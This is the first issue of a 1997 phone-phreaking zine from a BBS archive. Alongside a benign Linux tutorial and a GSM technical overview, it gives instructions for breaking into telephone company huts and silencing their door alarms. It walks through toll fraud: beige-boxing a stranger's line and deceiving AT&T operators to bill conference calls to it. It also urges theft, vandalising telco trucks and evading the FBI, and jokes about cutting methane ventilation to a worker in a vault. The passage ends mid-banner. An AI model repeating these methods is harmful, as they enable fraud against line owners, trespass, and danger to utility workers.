The Unsorted BBS Collection

home *** CD-ROM | disk | FTP | other *** search

/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / texts / boxes / TRASH / npa1.txt < prev next >

Wrap

Text File | 1998-01-27 | 84KB | 1,729 lines

Nation Phreaks Association Presents: ************************************ * __ _ _______ __ * * /| \ /| | /| _____ | /| \ * * | | \| | | | | |___/ | | | \ * * | | |\ \ | | | | _____/ | | |\ \ * * | | | \ \| | | | |___/ | | _ \ * * | | |\ \ | | | | | | | \ \ * * | |_| \ \__| | |_| | |_|\ \__\ * * |/__/ \/__/ |/__/ |/__/ \/__/ * ************************************************ (AsciI art by KoSmoS) A zine thats not full of shit Opening Message From SKaLaR109 109(founder of NPA) There are times when the seriousness of a certain situation may forgo you to Become very hateful toward the world therefor causing you to have no care or take no responsibilities for what you have done or do. This scenario is true in almost all aspects of life. Perhaps you obtained your interest in the arts of H/P, by means of this way. Maybe not. The Government along with various monopolies, such as Bell (by the way they claim not to be), Microsoft (speaks for itself), and Apple, (HAHA yeah fucking right) wish to Feed us lies about the state of our world and countries today. These Lies have a Name. That name is Conventional Wisdom. Everyday we are Fed lies. Lies about who we are. Lies about what we have achieved, About the past. History is written by those that conquer. Those that conquer are not always those that we can trust. Although we may have marveled at that great day in the 1960's when Man first Set Foot on A Hollywood Stage, and claimed it to be one small step for man, We still have Hungry families and homeless that wish to be considered mankind. Why do we ridicule those that are less fortunate. Why do we Fl0at around in a fucking Space station that doesnÆt work while there are children that need to be fed and mothers that need medical attention. Why The fuck do we Put people like Mitnick in jail when there are people that have babies and kill them by shoving toilet paper in their mouth and only get 1 1/2 years in jail for it. Do you see what I am saying. While Telco sits back and charges a arm and leg for services that should be free another child dies from starvation. While The Government spends Millions of dollars on bullshit encryption programs and flying wonders, another man dies from the pneumonia because he didnÆt have insurance so he couldnÆt go to the hospital. WHY the FUCK Should I have to pay for higher Education? I Say Fuck The Assholes that sit back and Get Rich off of Meaningless shit. Are we not entitled to education or knowledge? Are we not entitled to talk to whom we want when we please? therefor I say to you fellow Hackers and Phreakers. Fuck the Government And Telc0. Obtain all you can and how you can. If you Have the Skillz to Then DO SO. You Must realize though that stupidity is not the key. The Key is Knowledge. And if you Carefully do what you do you will not be penalized. Leave the trace of a f00l and pay the consequences. Finally I say to you... READ and READ like youÆve never before. Do not Be afraid to spend money on anything that will be a source of Knowledge to you (in other words donÆt steal Books). The authors deserve the money. In this Zine you will Find Useful information on how to survive in This World as a Hacker And Phreak Please use this information Wisely. My last words to you are Go and Learn for Knowledge is Power. IMPORTANT NOTE!!! THIS ZINE HAS BEEN DIVIDED INTO A CERTAIN FORMAT... YOU WILL FIND BEGINERS FILES TOWARD THE BEGINING OF THIS ZINE UNDER SECTION I. AND MORE TECHNICAL AND NON BEGINNER ORIENTATED FILES TOWARD THE END UNDER SECTION II. SKaLaR109/NPA 97 Opening Message From King Lazuras(Editor of NPA) Hey, I'm King Lazuras, editor, were a little late on this. My fault completely. Well, this should be a pretty good first issue. It doesn't have a red box issue like most new zines do, which I am quite happy about. Hell, you probably will actually learn from this. I have read many zines in the past, and know most of them don't have more then 3 words of proper English, and the rest is K-R4D 31337!!!<!>! So, we decided that this is going to be semi-correct. Not totally(after all, I am just some stupid little phreak....) but I will try. INDEX: 1. Shout Outs a. From SKaLaR109 109 b. From Aardwolf c. From King Lazuras 2. Writers/Editors/Other Important People List **********************SECTION I******************* (Beginner Files) 3. Articles a. Bell Huts By Kosmos b. Setting Up An Emergency Kit By Aardwolf c. Linux: A Beginners Tutorial Part 1: Basic Information By BurntToad d. Conference Set-Up By Madk0w e. Bell And Other Telco Trucks By Aardwolf ********************Section II**************** (AdvanCeD FilEZ) a. THE IN'S AND OUT'S OF GSM Part1 by Master_y0da b. EQUIBELL-ALT P DICTIONARY by KoSmoS c. Advanced CGI Explotation... by IsolationX d. Octel Systems by De-Format e. My Unix Port Hand Book by Master_y0da f. Using a Guest Lynx Account by Electric_Nectar g. URL Of The Month by SKaLaR109 4. Closing Ceremonies SHOUT OUTS ____________________________ From SKaLaR109 109: I'd like to give a shout out to all the H/P community because we are all equal, My Mommy , and Clarity who is the important lady in my life. From Aardwolf: NONE From King Lazuras: 2600 (I have met most of the 2600 crowd, even) (though they probably don't remember me.) (Emanuel might 'cause I got him annoyed ) ('cause I talk to fast...( I do...) ) Pam (she knows who she is, she rocks) Wolfgame (he knows who he is to (and he drove me to dinner ) (a bunch of times after 2600 meetings) ) Iggy ('cause he was the first person) (to actually remember me as Laz and not king) (and he knows who he is to.) My IRC Buddies-- IsolationX delphian ultram(he is gonna yell for me putting his name here) de-format --A LOT OF OTHER PEOPLE!!!!-- (To many people to list...Besides, not sure if anyone would ) (want to be associated with me. :) ) Writers/Editors/Other Important People List ___________________________________________________________ AdminIstration 1. SKaLaR109 109 -- The Cool Dude That Started NPA(Founder) 2. Aardwolf -- Cool Dude That Does Sooo Much, But Nothing Specific 3. King Lazuras -- Chief Editor(not such a cool dude, just me) NPA/Writing Staff and a Damn Good one might I add Collins Hotwire Madk0w Hype Sun_Fed_Darkness X-Human A_Clockwork_Orange Master Yoda Kosmos TheViking NivFreak De-Format BurntToad IsolationX Info234 Electric Nectar Heyitsme Technics Krazy_Tunez Kalony Strykereye Articles _________________________ A. BELL ATLANTIC HUTS __________________ By Kosmos 1997 INTRODUCTION ------------ Almost all of us have been in the situation were we say, is there not a challenge. Well first your too cocky, and second, no. In my area of Bell we have some thing we call a BELL HUT. A small building made of concrete with the classic light and dark tan of bell Atlantic. In here you will find what is in those, how not to be busted being in it, and what not to do in it. HOW TO GET IN ------------- Your classic brute forcing is always an option, yet you do not want to leave all those scratches on the pretty bell place, so if you can kill a bell man and get the key, or utilize that knowledge and lockpick it. ONCE YOUR IN ------------ Getting in was your problem, now I am guessing you do not want a cop on you. well look up in the upper left hand part of the doorway (on the frame). You see that "thing". Well if you just opened the door it is sending signals to the CO telling them that it is open. Not to worry though, cause you were smart and read Kosmos' file. If you pull out the "knob" you will close off the signal. (diagram later). You see when the door is closed it is pushed in fully, closed(circuit), when you open it is half-way, open(circuit), when you pull it is fully open, closed (circuit). Now your safe, from that anyway, you still need to worry about noise, being obvious, etc... WHAT TO DO NOW YOUR SAFE ------------------------ This hut is running a good full 10-20 blocks of houses, possibly more. But do NOT touch a thing, unless having a couple thousand volts through you sounds good. On one of the 2 long walls will be a grounder, a wrist band that will ground you so you don't fry. Now what you do with the copper is your problem, but you can splice, clip, and there is usually a phone on the wall. Now I have also seen a Flat Box (a flat 2-3 foot tall, 1 foot wide, 3-4 in thick box) just up on the wall, if you know what your doing in there, go for it. (on a flat, when you open it there are 2 columns of pins, grouped in 4 pins, clip to the upper most right one, go over one, down on and clip there to, bingo, dial-tone). Anyway there are also cabinets and god knows what is in there, usually a couple manuals. If you can take your time and glance around, I have know idea what you'll find near you. THE KEY ------- No sorry, not the key to the hut, the key of what to do when your in. At the copper all you will see is rows and rows of black rectangles, either fold them up or down, or open them like a cabinet, there are your wires^_^ WHAT NOT TO DO -------------- I just wanted to accent on this because I do not want to read, Phreak found Phried, in the newspaper. PLEASE DO NOT TOUCH A THING WITHOUT BEING GROUNDED!!! TIPS ---- -Have a friend sit out front with his bike like he is taking a break so he can notify you of a Telco truck coming, or something like that. -Be paranoid, be very paranoid. -Look, Listen, and Think. You may be very interested at finding something I may have overlooked. You never know. -Remember where you are and utilize that, everyone wants a conf. be kind^_^ DIAGRAM ------- _________ | | %=Conductor /|_________|_________|_______ ^=On (circuit) | _________ ____%____ _______| *=Off (circuit) \| | * ^ * | |________ | B. Setting Up An Emergency Kit ___________________________ By Aardwolf 1997 Introduction: ------------- Picture this: You were almost caught stealing car phones, you are out and do not have a kit, the FEDS are at your house, or any other emergency. What do you do? Well if you didnÆt read this file you would probably last about a week and finally get caught or die. Yet if you do read you will be prepared and would last a long time. The following file will explain the construction and setting up of an emergency kit. How it works: ------------- Basically its a backpack or something in the woods in a tree with a waterproof cover on it that has stuff you need in it to survive. When something happens and you need it you just go to that place in the woods and get it. Then you have all the resources you put in it. What you should have: --------------------- -Money (doesnÆt matter how much, $20 will last a long time if you know how to) -Food (crackers or other things that are filling that do not go bad are great) -Phield Phreaking Kit (For them calls) -Change of underwear (I wonder why) -Small wool blanket or something (it does get cold) -Matches, Lighter -Flashlight -Toilette paper (or just steal it from your local 7-11's bathroom) -NPA's file on loitering, surviving, and other cool shit -Hat/beenie (20% of heat loss is through your head) -Paper, Pen (Might need em) -List of numbers, family members, loyars -Anything you think you will need or you can fit in your backpack Placing: -------- You should put it in a place like the woods, and it should be close to somewhere you can get to easily. Just do not forget where it is! This thing might seem dumb but you will wish you had it when you are wanted by the FBI. C. Linux: A Beginners Tutorial Part 1: Basic Information ___________________________ By BurntToad 1997 1) Basic Commands: -------------- Learning Linux isn't easy but its power and the many ways it can be customized makes it worth the effort. If you think back to the first time you saw DOS's C: prompt, and had no idea what to do, you will feel that way the first time you see the Linux prompt; depending on the shell you are using the prompt will either be a $, a % or some other symbol like it, but the idea is the same. At this prompt you can either start up a program, manipulate files, or configure your system. Figure 1.0 ------------------------------------------------------------------------- UNIX DOS Action ------------------------------------------------------------------------- ls dir Displays information about files and directories. cd cd Changes the current directory. cp copy Copies files from one directory to another. mv move Moves a file to another directory. rm del Removes a file. mkdir mkdir Creates a new directory. rmdir rmdir Removes a directory. man help Displays help for a requested command. more more Displays a file pausing at the end of each screen. cat type Displays the contents of a file. grep ------ Displays the lines in a file that match a given pattern. chmod attrib Sets permissions on files and directories. chown ------ Change the ownership of the specified file(s). df dir Displays the amount of free space on the disk. wc ------ Provides count of words, or characters in a file. Fig. 1.0 shows some of the more basic UNIX commands. There are differences in the between the DOS and UNIX versions of specific commands. For the most part, UNIX commands have far more switches (options) available that their DOS relatives, and more are added as users demand them. More importantly UNIX was designed from the ground up as a multi-user network system, so commands like chmod and chown are crucial for security. The commands in Fig. 1.0 will help you get started but don't be surprised if you run into difficulties. You'll find that some programs do not appear to be doing anything and others have a very strange command system with no menu to help. The text editor vi is one; you might expect to load it then just start typing, but it doesnÆt work that way. Instead, you have to press the letter I for insert mode and then start typing. When it comes to saving the file, UNIX programmers like the more accurate term write, and they create their interfaces accordingly. Manual pages might be meant as help, but are usually far too detailed, and just confuse the average user. Be careful when you use the rm command because when you delete a file it is gone forever, and can not be undeleted. 2) UNIX Does Windows: ----------------- The X Windows System variously, called X Windows, X Window, or just X, is the primary graphical interface for UNIX, and can be activated by typing startx, or xmd. Unlike Windows 95 or NT, X Windows separates the base systems and the windowing system. The actual objects you see on the X desktop, including everything from icons to toolbars to menus, come from a program called a window manager. Think of it this way: If you could completely replace your Windows 95 desktop with a different system of managing UI objects and windows designs, with only the core OS components running underneath, you'd be closer to the X Windows model. The most popular window manager is called fvwm, which is a stripped down model of twm, the powerful, but memory hungry window manager that comes with X11 proper. Other window managers include mwm (the motif window manager), and olwm (Sun Microsystems' Open Look Interface). X Windows was designed around the three button mouse son its a good idea to have one. 3) Installing And Configuring X Windows Getting used to X isn't a problem, but getting it up and running may be. Typically, you install it from the CD-ROM or FTP site. In Red Hat 4.1 and Caldera OpenLinux Base, the installation is more or less automatic. It's one thing, however to copy a systems files onto your hard disk, and yet another to make them work with your hardware. That's where many would be Linux users give up. Once you have it up and running, the next question is what you can do with it. The is , quite simply anything. True X, wont run Windows applications, with an emulator like WINE that is now in the making, but many of the more popular software is made into a UNIX version, like Netscape Navigator, or Corel WordPerfect UNIX, or even DOOM. The combination of Linux and XFREE86 offers a rich, powerful, and complex operating system with excellent salability and constant new development. At first you may find yourself back in windows more so than Linux, and you may wonder why you used up a big chunk of your hard disk for something you do not even use. Eventually you will spend more and more time in Linux. The fact is, together Linux and X, let you build a system suited precisely to your needs and to your network, with freely available development tools at your disposal. You need a lot of time to learn Linux well, but you'll find that the time was well spent. XFREE86 is just a version of the MIT X Window System and is a available for System V/386, 386BSD, and other x86 UNIX implementations..X11R6 is just the X Windows in UNIX. Any questions can be emailed to: BurntToad@hotmail.com D. Conference Set-Up _________________ By Madk0w 1997 In this is the first submission I've made to the NPA and IÆll be talking about Meet-Me conferences and Dial-In Bridges, how to set them up, and methods of billing (not that we pay of course). The most popular and the most convenient conferences are of course the AT&T Dial-In bridges. These are the conferences that most everyone is familiar with. As I found out, I have more fun setting them up than actually calling into them, but thats just me I guess. First things first, to set up conference's you must Beige Box, or use a cotcot I like to beige Box, because this is the most convenient way so we'll just stick with that for now. Now I will not be explaining what a Beige is or how to make one since there are probably more T-files on that box than any other. You can even find them on your local PD board. But get your beige box and get ready to field phreak. This is just a suggestion but before you get out there and hook up I would have the info and equipment you will need to set up the conference. You don't need alot of shit. All you need is a Pen and a piece of paper, and maybe something hard to write on. I recommend a pen over a pencil for obvious reasons. It would not be cool to break your lead while on the phone with the Meet-Me operator. On the piece of paper you should write the number of the Tele-Conference service and either your local ANI or an 800. I will post all the number's and other information you will need to know at the end of this article. OK, when you have all your equipment go hook up your beige to wherever you beige from. Now the only time I beige it's never from the same location. Since it's usually at different times of the night, I never know if the owner of the phone line is home or not. So what IÆve found to work best is when you're hooking up to your line make sure it has call waiting. The operator will call you back after you set up the conference and having the owner of the phone line pick up his phone could lead to some very uncomfortable moments! You can find a line with call waiting by hitting *70 on every line until you hear the three short dial tones. I hope everyone knows what I mean. Anyway, call the ANI and write the number down because the operator will ask you what number you're calling from, this is how they bill the number. Next call the Tele-conference service and set up your meet-MEÆs. The rest is basically talking with the operator and bullshitting her (or BullSHit as Visionary would say). I'm not gonna tell you what to say to her. I mean it might take you a couple of try's before you know what to say and are convincing enough, but I will tell you this, keep it short and simple. As Dead Kat and I have found out, it's easier to just say: "I need six conference's set for the 1st,2nd,3rd,etc.. of December... from 6pm to 2:00am EST.. and I want to bill them to the number I'm calling from..." There's no need to make one call for every conference. Oh, and I almost forgot, she will ask you how many ports you want. What she means is how many lines in do you want. You can have up to 20 ports, but I would not recommend this at all. Twenty people on a conference tends to make it hard to talk to anyone. I would say no more than ten, maybe 15 if you know a shit load of people will call, but ten should do the trick. As soon as you hang up with her, dial a number that you know will ring and that will let you stay on for a few minutes. A good example is a VMB with a long greet or maybe a number that just rings forever I use 1-800-777-8854 just because I don't like the people that work there. Stay on the line until you hear the call waiting beep and just click over. When you answer, the op will tell you the pin's and numbers for the conferences. Just work with what you have, you probably will have your own style and what not, but let me mention this, the op will give you a "Host PIN". This is for the person who set it up and no one else. Just some advice, don't call the conference direct and use this code. You'll end up paying for the meet-me. Well it's easy. All you need is a beige box, a place to beige, and the 800 number. Here are the numbers for the ATT conference's. These numbers are basically the same, you can call either one and set them up. 1-800-232-1111 -AT&T Conference Set-up 1-800-544-6363 -AT&T Conference Set-up 0-700-456-1000 -AT&T's Alliance Teleconferencing 0-700-456-2000 -AT&T's Alliance Teleconferencing 1-800-544-6363 -AT&T's Alliance Teleconferencing 1-800-366-2663 -Sprint Teleconference 1-800-487-9240 -ANI 1-800-444-4444 -press 1 and wait for ANI Next issue of NPA IÆll tell you how to set up a conference using Worldvox. And I thought IÆd give you a little bit of info... I called AT&T Conference Set-up # and the price per minute is about .55 cents a minute per line plus a 15.00 setup fee, so after the conference add up the approx. amount of people that were on and how long the conference was up for and find out how much of a bill it is. I'm sure the people who's house you beige from won't be happy when they get there $1000+ bill. Heh! E. Bell and other Telco Trucks ___________________________ By Aardwolf 1997 Introduction: ------------- Telco trucks. We all know and love them... As we all know they come in many flavors and colors but who really really understands them? What is in them? What is their gas mailing. And how the hell do they drive them pieces of shit. The above questions may or may not be answered in this file so do not blink and eat your corn. Telco Van: ---------- Dodge Ram 2500. Comes in white, gray, and green and gray (1970's) Used by a wide variety of bell guys (Install, Repair, Splices) Contain common equipment including shovels and manuals. Have yellow flashy light on roof. Very common. Telco Car: ---------- Gray and white. Have simple equipment (test set and some tools) Used by CO-Tech and Engineers. May make home visits but mainly for business use. Does not have yellow flashy light on roof. Not very common. Usually found around COÆs and sometimes truck yards. Telco Truck: ------------ White or gray. Used by some of the other bell guys. Usually emergency vehicles for if a cable is cut or digging. May or may not have test set depending on area. Manuals and maps. And picks, axÆs, and shovels. Good amount of em but not as common as vans. Do have yellow flashy thingy. Telco Bucket Truck ------------------ Very cool trucks. Just about as common as normal trucks depending on the area. These suckers have a crane with a large bucket in em. They have common equipment (testset, shovels, etc....) Bell uses these suckers for working on Arial lines. Only the true linemen use these, Not the install and repair or other guys. These guys have been with Telco for a while and know what they are doing. They are usually white or gray like normal trucks. They do have a flashy yellow thingy, and alot of equipment like road cones, umbrellas, and lots of Arial cable and shit. Telco Armored Trucks: --------------------- These trucks are funky looking. They look like a banks armored car but are bells. I have only seen white ones. Whey have front windows and thats it. They are shaped like a hi-tech ambulance. They carry ladders and have a yellow flashy thingy. They have the common equipment, along with digging tools like mad! They have cabinets on the sides (locked :() which have tools up the bunghole. They also can be used as mobile bell bases. These are very uncommon and are mostly by bell huts or manholes. If you see one put that sledge hammer to use. :) Telco Trailer: -------------- This is a trailer that hooks on to the back of Telco trucks and vans. They use these when they go in manholes. They are used to provide the lineman inside with power, light, and flier out the methane gasses. They are only found when bell's in the manholes. WouldnÆt it be fun to turn it off while a lineman is in the vault? hehehe.... *********************Section II********************** A. THE IN'S AND OUT'S OF GSM Part 1 by (\/)@ster Y0d@ mastyoda@concentric.net During the early 1980s, analog cellular telephone systems were experiencing rapid growth in Europe, particularly in Scandinavia and the United Kingdom, but also in France and Germany. Each country developed its own system, which was incompatible with everyone else's in equipment and operation. This was an undesirable situation, because not only was the mobile equipment limited to operation within national boundaries, which in a unified Europe were increasingly unimportant, but there was a very limited market for each type of equipment, so economies of scale, and the subsequent savings, could not be realized. The Europeans realized this early on, and in 1982 the Conference of European Posts and Telegraphs (CEPT) formed a study group called the Groupe Spécial Mobile (GSM) to study and develop a pan-European public land mobile system. The proposed system had to meet certain criteria: good subjective speech quality, low terminal and service cost, support for international roaming, ability to support handhald terminals, support for range of new services and facilities, spectral efficiency, and ISDN compatibility. In 1989, GSM responsibility was transferred to the European Telecommunication Standards Institute (ETSI), and phase I of the GSM specifications were published in 1990. Commercial service was started in mid-1991, and by 1993 there were 36 GSM networks in 22 countries, with 25 additional countries having already selected or considering GSM [DS93]. This is not only a European standard - South Africa, Australia, and many Middle and Far East countries have chosen GSM. By the beginning of 1994, there were 1.3 million subscribers worldwide [Nil]. The acronym GSM now (aptly) stands for Global System for Mobile telecommunications. The developers of GSM chose an unproven (at the time) digital system, as opposed to the then-standard analog cellular systems like AMPS in the United States and TACS in the United Kingdom. They had faith that advancements in compression algorithms and digital signal processors would allow the fulfillment of the original criteria and the continual improvement of the system in terms of quality and cost. The 8000 pages of the GSM recommendations try to allow flexibility and competitive innovation among suppliers, but provide enough guidelines to guarantee the proper interworking between the components of the system. This is done in part by providing descriptions of the interfaces and functions of each of the functional entities defined in the system. 2 Services provided by GSM References: [Har93a, Har93b, DS93, FR93, LM92, Hub92] >From the beginning, the planners of GSM wanted ISDN compatibility in services offered and control signalling used. The radio link imposed some limitations, however, since the standard ISDN bit rate of 64 kbps could not be practically achieved. Using the ITU-T definitions, telecommunication services can be divided into bearer services, teleservices, and supplementary services. The digital nature of GSM allows data, both synchronous and asynchronous, to be transported as a bearer service to or from an ISDN terminal. Data can use either the transparent service, which has a fixed delay but no guarantee of data integrity, or a non-transparent service, which guarantees data integrity through an Automatic Repeat Request (ARQ) mechanism, but with a variable delay. The data rates supported by GSM are 300 bps, 600 bps, 1200 bps, 2400 bps, and 9600 bps [Har93a]. The most basic teleservice supported by GSM is telephony. There is an emergency service, where the nearest emergency-service provider is notified by dialling three digits (similar to 911). Group 3 fax, an analog method described in ITU-T recommendation T.30 [Har93b], is also supported by use of an appropriate fax adaptor. A unique feature of GSM compared to older analog systems is the Short Message Service (SMS). SMS is a bidirectional service for sending short alphanumeric (up to 160 bytes) messages in a store-and-forward fashion. For point-to-point SMS, a message can be sent to another subscriber to the service, and an acknowledgement of receipt is provided to the sender. SMS can also be used in a cell-broadcast mode, for sending messages such as traffic updates or news updates. Messages can be stored in the SIM card for later retrieval [Bal93]. Supplementary services are provided on top of teleservices or bearer services, and include features such as caller identification, call forwarding, call waiting, multi-party conversations, and barring of outgoing (international) calls, among others. 3 Architecture of the GSM network References: [DS93, FR93, B+93, LM92, Hub92, Rah93, SK93] A GSM network is composed of several functional entities, whose functions and interfaces are defined. Figure 1 shows the layout of a generic GSM network. The GSM network can be divided into three broad parts. The Mobile Station is carried by the subscriber, the Base Station Subsystem controls the radio link with the Mobile Station. The Network Subsystem, the main part of which is the Mobile services Switching Center, performs the switching of calls between the mobile and other fixed or mobile network users, as well as management of mobile services, such as authentication. Not shown is the Operations and Maintenance center, which oversees the proper operation and setup of the network. The Mobile Station and the Base Station Subsystem communicate across the Um interface, also known as the air interface or radio link. The Base Station Subsystem communicates with the Mobile service Switching Center across the A interface. 3.1 Mobile Station The mobile station (MS) consists of the physical equipment, such as the radio transceiver, display and digital signal processors, and a smart card called the Subscriber Identity Module (SIM). The SIM provides personal mobility, so that the user can have access to all subscribed services irrespective of both the location of the terminal and the use of a specific terminal. By inserting the SIM card into another GSM cellular phone, the user is able to receive calls at that phone, make calls from that phone, or receive other subscribed services. The mobile equipment is uniquely identified by the International Mobile Equipment Identity (IMEI). The SIM card contains the International Mobile Subscriber Identity (IMSI), identifying the subscriber, a secret key for authentication, and other user information. The IMEI and the IMSI are independent, thereby providing personal mobility. The SIM card may be protected against unauthorized use by a password or personal identity number. 3.2 Base Station Subsystem The Base Station Subsystem is composed of two parts, the Base Transceiver Station (BTS) and the Base Station Controller (BSC). These communicate across the specified A-bis interface, allowing (as in the rest of the system) operation between components made by different suppliers. The Base Transceiver Station houses the radio tranceivers that define a cell and handles the radio-link protocols with the Mobile Station. In a large urban area, there will potentially be a large number of BTSs deployed. The requirements for a BTS are ruggedness, reliability, portability, and minimum cost. The Base Station Controller manages the radio resources for one or more BTSs. It handles radio-channel setup, frequency hopping, and handovers, as described below. The BSC is the connection between the mobile and the Mobile service Switching Center (MSC). The BSC also translates the 13 kbps voice channel used over the radio link to the standard 64 kbps channel used by the Public Switched Telephone Network or ISDN. 3.3 Network Subsystem The central component of the Network Subsystem is the Mobile services Switching Center (MSC). It acts like a normal switching node of the PSTN or ISDN, and in addition provides all the functionality needed to handle a mobile subscriber, such as registration, authentication, location updating, handovers, and call routing to a roaming subscriber. These services are provided in conjuction with several functional entities, which together form the Network Subsystem. The MSC provides the connection to the public fixed network (PSTN or ISDN), and signalling between functional entities uses the ITU-T Signalling System Number 7 (SS7), used in ISDN and widely used in current public networks. The Home Location Register (HLR) and Visitor Location Register (VLR), together with the MSC, provide the call-routing and (possibly international) roaming capabilities of GSM. The HLR contains all the administrative information of each subscriber registered in the corresponding GSM network, along with the current location of the mobile. The current location of the mobile is in the form of a Mobile Station Roaming Number (MSRN) which is a regular ISDN number used to route a call to the MSC where the mobile is currently located. There is logically one HLR per GSM network, although it may be implemented as a distributed database. The Visitor Location Register contains selected administrative information from the HLR, necessary for call control and provision of the subscribed services, for each mobile currently located in the geographical area controlled by the VLR. Although each functional entity can be implemented as an independent unit, most manufacturers of switching equipment implement one VLR together with one MSC, so that the geographical area controlled by the MSC corresponds to that controlled by the VLR, simplifying the signalling required. Note that the MSC contains no information about particular mobile stations - this information is stored in the location registers. The other two registers are used for authentication and security purposes. The Equipment Identity Register (EIR) is a database that contains a list of all valid mobile equipment on the network, where each mobile station is identified by its International Mobile Equipment Identity (IMEI). An IMEI is marked as invalid if it has been reported stolen or is not type approved. The Authentication Center is a protected database that stores a copy of the secret key stored in each subscriber's SIM card, which is used for authentication and ciphering of the radio channel. 4 Radio link aspects References: [Che91, Bal91, Bal93, Rah93, Wat93] The International Telecommunication Union (ITU), which manages the international allocation of radio spectrum (among other functions) allocated the bands 890-915 MHz for the uplink (mobile station to base station) and 935-960 MHz for the downlink (base station to mobile station) for mobile networks in Europe. Since this range was already being used in the early 1980s by the analog systems of the day, the CEPT had the foresight to reserve the top 10 MHz of each band for the GSM network that was still being developed. Eventually, GSM will be allocated the entire 2x25 MHz bandwidth. Since radio spectrum is a limited resource shared by all users, a method must be devised to divide up the bandwidth among as many users as possible. The method chosen by GSM is a combination of Time- and Frequency-Division Multiple Access (TDMA/FDMA). The FDMA part involves the division by frequency of the total 25 MHz bandwidth into 124 carrier frequencies of 200 kHz bandwidth. One or more carrier frequencies are then assigned to each base station. Each of these carrier frequencies is then divided in time, using a TDMA scheme, into eight time slots. One time slot is used for transmission by the mobile and one for reception. They are separated in time so that the mobile unit does not receive and transmit at the same time, a fact that simplifies the electronics. In the rest of this section, the procedure involved in digitally transmitting a voice signal in a GSM network is examined, along with some of the features, such as discontinuous transmission and reception, used to improve voice quality, reduce the mobile unit's power consumption, and increase the overall capacity of the network. 4.1 Channel structure The structure of the most common time-slot burst is shown in Figure 2. A total of 156.25 bits is transmitted in 0.577 milliseconds, giving a gross bit rate of 270.833 kbps. There are three other types of burst structure for frame and carrier synchronization and frequency correction. The 26-bit training sequence is used for equalization, as described below. The 8.25 bit guard time allows for some propagation time delay in the arrival of bursts. Each group of eight time slots is called a TDMA frame, which is transmitted every 4.615 ms. TDMA frames are further grouped into multiframes to carry control signals. There are two types of multiframe, containing 26 or 51 TDMA frames. The 26-frame multiframe contains 24 Traffic Channels (TCH) and two Slow Associated Control Channels (SACCH) which supervise each call in progress. The SACCH in frame 12 contains eight channels, one for each of the eight connections carried by the TCHs. The SACCH in frame 25 is not currently used, but will carry eight additional SACCH channels when half-rate traffic is implemented. A Fast Associated Control Channel (FACCH) works by stealing slots from a traffic channel to transmit power control and handover-signalling messages. The channel stealing is done by setting one of the control bits in the time slot burst. In addition to the Associated Control Channels, there are several other control channels which (except for the Stand-alone Dedicated Control Channel) are implemented in time slot 0 of specified TDMA frames in a 51-frame multiframe, implemented on a non-hopping carrier frequency in each cell. The control channels include: Broadcast Control Channel (BCCH): Continually broadcasts, on the downlink, information including base station identity, frequency allocations, and frequency-hopping sequences. Stand-alone Dedicated Control Channel (SDCCH): Used for registration, authentication, call setup, and location updating. Implemented on a time slot, together with its SACCH, selected by the system operator. Common Control Channel (CCCH): Comprised of three control channels used during call origination and call paging. Random Access Channel (RACH): A slotted Aloha channel to request access to the network Paging Channel (PCH): Used to alert the mobile station of incoming call. Access Grant Channel (AGCH): Used to allocate an SDCCH to a mobile for signalling, following a request on the RACH. 4.2 Speech coding References: [NHdB89, V+89, S+89] GSM is a digital system, so speech signals, inherently analog, have to be digitized. The method employed by ISDN, and by current telephone systems for multiplexing voice lines over high speed trunks and optical fiber lines, is Pulse Coded Modulation (PCM). The output stream from PCM is 64 kbps, too high a rate to be feasible over a radio link. The 64 kbps signal contains much redundancy, although it is simple to implement. The GSM group studied several voice coding algorithms on the basis of subjective speech quality and complexity (which is related to cost, processing delay, and power consumption once implemented) before arriving at the choice of a Regular Pulse Excited - Linear Predictive Coder (RPE-LPC) with a Long Term Predictor loop. Basically, information from previous samples, which does not change very quickly, is used to predict the current sample. The coefficients of the linear combination of the previous samples, plus an encoded form of the residual, the difference between the predicted and actual sample, represent the signal. Speech is divided into 20 millisecond samples, each of which is encoded as 260 bits, giving a total bit rate of 13 kbps. 4.3 Channel coding and modulation Due to natural or man-made electromagnetic interference, the encoded speech or data transmitted over the radio interface must be protected as much as is practical. The GSM system uses convolutional encoding and block interleaving to achieve this protection. The exact algorithms used differ for speech and for different data rates. The method used for speech blocks will be described below. Recall that the speech codec produces a 260 bit block for every 20 ms speech sample. From subjective testing, it was found that some bits of this block were more important for perceived speech quality than others. The bits are thus divided into three classes: Class Ia 50 bits - most sensitive to bit errors Class Ib 132 bits - moderately sensitive to bit errors Class II 78 bits - least sensitive to bit errors Class Ia bits have a 3 bit Cyclic Redundancy Code added for error detection. If an error is detected, the frame is judged too damaged to be comprehensible and it is discarded. It is replaced by a slightly attenuated version of the previous correctly received frame. These 53 bits, together with the 132 Class Ib bits and a 4 bit tail sequence (a total of 189 bits), are input into a 1/2 rate convolutional encoder of constraint length 4. Each input bit is encoded as two output bits, based on a combination of the previous 4 input bits. The convolutional encoder thus outputs 378 bits, to which are added the 78 remaining Class II bits, which are unprotected. Thus every 20 ms speech sample is encoded as 456 bits, giving a bit rate of 22.8 kbps. To further protect against the burst errors common to the radio interface, each sample is diagonally interleaved. The 456 bits output by the convolutional encoder are divided into 8 blocks of 57 bits, and these blocks are transmitted in eight consecutive time-slot bursts. Since each time-slot burst can carry two 57 bit blocks, each burst carries traffic from two different speech samples. Recall that each time-slot burst is transmitted at a gross bit rate of 270.833 kbps. This digital signal is modulated onto the analog carrier frequency, which has a bandwidth of 200 kHz, using Gaussian-filtered Minimum Shift Keying (GMSK). GMSK was selected over other modulation schemes as a compromise between spectral efficiency, complexity of the transmitter, and limited spurious emissions. The complexity of the transmitter is related to power consumption, which should be minimized for the mobile station. The spurious radio emissions, outside of the allotted bandwidth, must be strictly controlled so as to limit adjacent channel interference, and allow for the co-existence of GSM and the older analog systems (at least for the time being). 4.4 Multipath equalization At the 900 MHz range, radio waves bounce off everything - buildings, hills, cars, airplanes, etc. Thus many reflected signals, each with a different phase, can reach an antenna. Equalization is used to extract the desired signal from the unwanted reflections. Equalization works by finding out how a known transmitted signal is modified by multipath fading, and constructing an inverse filter to extract the rest of the desired signal. This known signal is the 26-bit training sequence transmitted in the middle of every time slot burst. The actual implementation of the equalizer is not specified in the GSM specifications. *Due To the Intense Length Of this Article It Has Been Broken Into 3 Parts Part 2 will Be Posted in NPA2* :"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""": : EQUIBELL-ALT P DICTIONARY : : : : by : : _ __ __ ____ : : | |/ / / \ | ___ : : | / | | | |__ | : : | \ | | | 